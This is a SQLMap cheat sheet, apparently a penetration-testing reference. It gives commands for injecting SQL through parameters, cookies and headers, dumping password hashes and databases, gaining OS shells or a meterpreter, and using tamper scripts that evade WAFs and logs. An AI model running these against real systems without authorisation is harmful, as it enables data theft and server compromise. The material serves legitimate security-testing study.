# SQLMap - Cheetsheat ## Basic arguments for SQLmap ### Generic ```bash -u "" -p "" --user-agent=SQLMAP --random-agent --threads=10 --risk=3 #MAX --level=5 #MAX --dbms="" --os="" --technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ") --batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --auth-type="" #HTTP authentication type (Basic, Digest, NTLM or PKI) --auth-cred="" #HTTP authentication credentials (name:password) --proxy=PROXY ``` ### Retrieve Information #### Internal ```bash --current-user #Get current user --is-dba #Check if current user is Admin --hostname #Get hostname --users #Get usernames od DB --passwords #Get passwords of users in DB ``` #### DB data ```bash --all #Retrieve everything --dump #Dump DBMS database table entries --dbs #Names of the available databases --tables #Tables of a database ( -D ) --columns #Columns of a table ( -D -T ) -D -T
-C #Dump column ``` ## Injection place ### From Burp/ZAP capture Capture the request and create a req.txt file ```bash sqlmap -r req.txt --current-user ``` ### GET Request Injection ```bash sqlmap -u "http://example.com/?id=1" -p id sqlmap -u "http://example.com/?id=*" -p id ``` ### POST Request Injection ```bash sqlmap -u "http://example.com" --data "username=*&password=*" ``` ### Injections in Headers and other HTTP Methods ```bash #Inside cookie sqlmap -u "http://example.com" --cookie "mycookies=*" #Inside some header sqlmap -u "http://example.com" --headers="x-forwarded-for:*" sqlmap -u "http://example.com" --headers="referer:*" #PUT Method sqlmap --method=PUT -u "http://example.com" --headers="referer:*" #The injection is located at the '*' ``` ### Second order injection ```bash python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs ``` ### Shell ```bash #Exec command python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami #Simple Shell python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell #Dropping a reverse-shell / meterpreter python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn ``` ### Crawl a website with SQLmap and auto-exploit ```bash sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3 --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --crawl = how deep you want to crawl a site --forms = Parse and test forms ``` ## Customizing Injection ### Set a suffix ```bash python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` ### Prefix ```bash python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') " ``` ### Help finding boolean injection ```bash # The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection) sqlmap -r r.txt -p id --not-string ridiculous --batch ``` ### Tamper ```bash --tamper=name_of_the_tamper #In kali you can see all the tampers in /usr/share/sqlmap/tamper ``` | Tamper | Description | | :--- | :--- | | apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | | apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart | | appendnullbyte.py | Appends encoded NULL byte character at the end of payload | | base64encode.py | Base64 all characters in a given payload | | between.py | Replaces greater than operator \('>'\) with 'NOT BETWEEN 0 AND \#' | | bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | | chardoubleencode.py | Double url-encodes all characters in a given payload \(not processing already encoded\) | | commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' | | commalessmid.py | Replaces instances like 'MID\(A, B, C\)' with 'MID\(A FROM B FOR C\)' | | concat2concatws.py | Replaces instances like 'CONCAT\(A, B\)' with 'CONCAT\_WS\(MID\(CHAR\(0\), 0, 0\), A, B\)' | | charencode.py | Url-encodes all characters in a given payload \(not processing already encoded\) | | charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload \(not processing already encoded\). "%u0022" | | charunicodeescape.py | Unicode-url-encodes non-encoded characters in a given payload \(not processing already encoded\). "\u0022" | | equaltolike.py | Replaces all occurances of operator equal \('='\) with operator 'LIKE' | | escapequotes.py | Slash escape quotes \(' and "\) | | greatest.py | Replaces greater than operator \('>'\) with 'GREATEST' counterpart | | halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | | ifnull2ifisnull.py | Replaces instances like 'IFNULL\(A, B\)' with 'IF\(ISNULL\(A\), B, A\)' | | modsecurityversioned.py | Embraces complete query with versioned comment | | modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | | multiplespaces.py | Adds multiple spaces around SQL keywords | | nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement \(e.g. .replace\("SELECT", ""\)\) filters | | percentage.py | Adds a percentage sign \('%'\) infront of each character | | overlongutf8.py | Converts all characters in a given payload \(not processing already encoded\) | | randomcase.py | Replaces each keyword character with random case value | | randomcomments.py | Add random comments to SQL keywords | | securesphere.py | Appends special crafted string | | sp\_password.py | Appends 'sp\_password' to the end of the payload for automatic obfuscation from DBMS logs | | space2comment.py | Replaces space character \(' '\) with comments | | space2dash.py | Replaces space character \(' '\) with a dash comment \('--'\) followed by a random string and a new line \('\n'\) | | space2hash.py | Replaces space character \(' '\) with a pound character \('\#'\) followed by a random string and a new line \('\n'\) | | space2morehash.py | Replaces space character \(' '\) with a pound character \('\#'\) followed by a random string and a new line \('\n'\) | | space2mssqlblank.py | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters | | space2mssqlhash.py | Replaces space character \(' '\) with a pound character \('\#'\) followed by a new line \('\n'\) | | space2mysqlblank.py | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters | | space2mysqldash.py | Replaces space character \(' '\) with a dash comment \('--'\) followed by a new line \('\n'\) | | space2plus.py | Replaces space character \(' '\) with plus \('+'\) | | space2randomblank.py | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters | | symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts \(&& and | | unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | | unmagicquotes.py | Replaces quote character \('\) with a multi-byte combo %bf%27 together with generic comment at the end \(to make it work\) | | uppercase.py | Replaces each keyword character with upper case value 'INSERT' | | varnish.py | Append a HTTP header 'X-originating-IP' | | versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | | versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | | xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' |